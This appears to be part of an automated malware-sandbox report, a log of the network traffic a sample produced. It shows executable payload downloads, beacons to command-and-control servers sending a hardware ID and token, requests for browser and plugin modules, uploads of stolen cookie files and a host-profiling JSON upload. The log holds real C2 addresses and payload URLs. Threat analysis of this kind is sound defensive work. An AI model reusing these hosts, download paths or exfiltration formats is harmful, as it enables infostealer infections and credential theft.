                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:27:08 GMTContent-Type: application/octet-streamContent-Length: 1738752Last-Modified: Thu, 19 Dec 2024 12:37:48 GMTConnection: keep-aliveETag: "6764139c-1a8800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 45 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 45 00 00 04 00 00 4c 05 1b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 a0 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 70 78 7a 64 68 62 62 00 40 1a 00 00 c0 2a 00 00 28 1a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6d 6c 68 62 69 6b 70 00 20 00 00 00 00 45 00 00 04 00 00 00 62 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 45 00 00 22 00 00 00 66 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:27:12 GMTContent-Type: application/octet-streamContent-Length: 2940416Last-Modified: Thu, 19 Dec 2024 12:39:26 GMTConnection: keep-aliveETag: "676413fe-2cde00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 10 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 50 00 00 04 00 00 37 0d 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 74 78 65 65 6b 76 6c 00 40 2b 00 00 c0 24 00 00 3c 2b 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 66 6d 71 6f 67 6c 63 00 10 00 00 00 00 50 00 00 04 00 00 00 b8 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 50 00 00 22 00 00 00 bc 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 46 30 33 43 33 42 42 32 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 2d 2d 0d 0a Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="hwid"C1F03C3BB2381806970752------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="build"stok------KKFHJDAEHIEHJJKFBGDA--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHIDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 44 2d 2d 0d 0a Data Ascii: ------AKFCBFHJDHJKECAKEHIDContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------AKFCBFHJDHJKECAKEHIDContent-Disposition: form-data; name="message"browsers------AKFCBFHJDHJKECAKEHID--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="message"plugins------GIEBAECAKKFCBFIEGCBK--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="message"fplugins------GIEHIDHJDBFIIECAKECB--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDAHost: 185.215.113.206Content-Length: 5735Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 31 37 36 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1017623001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFHHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------FIJKEHJJDAAKFHIDAKFH--
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 36 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017624001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDGDBFCBKFHJKFHCBKHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/wicked/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJJEBFCGDAKFIEBAAFBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 2d 2d 0d 0a Data Ascii: ------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="file"------KKJJEBFCGDAKFIEBAAFB--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="file"------BGDAAEHDHIIJKECBKEBA--
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 500840Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 36 31 34 34 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 